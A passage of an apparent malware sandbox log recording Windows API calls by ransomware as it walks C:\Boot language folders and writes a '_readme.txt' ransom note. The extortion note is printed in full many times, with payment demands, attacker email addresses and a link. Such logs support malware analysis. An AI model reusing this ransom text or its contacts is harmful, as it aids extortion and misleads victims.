hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.868] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0179.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.868] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.869] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.869] PathFindFileNameW (pszPath="") returned="" [0179.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.869] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.869] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0179.870] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0179.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.870] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac3dd0 [0179.871] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0179.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.872] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0179.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0179.872] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.872] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.873] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0179.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0179.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.874] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*" (normalized: "c:\\boot\\da-dk\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.875] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.875] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.875] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.875] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.876] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.886] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0179.886] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.886] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.886] PathFindFileNameW (pszPath="") returned="" [0179.886] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.886] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.887] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.887] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.887] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0179.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.887] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0179.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0179.889] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.889] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.889] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0179.890] HeapFree (in: 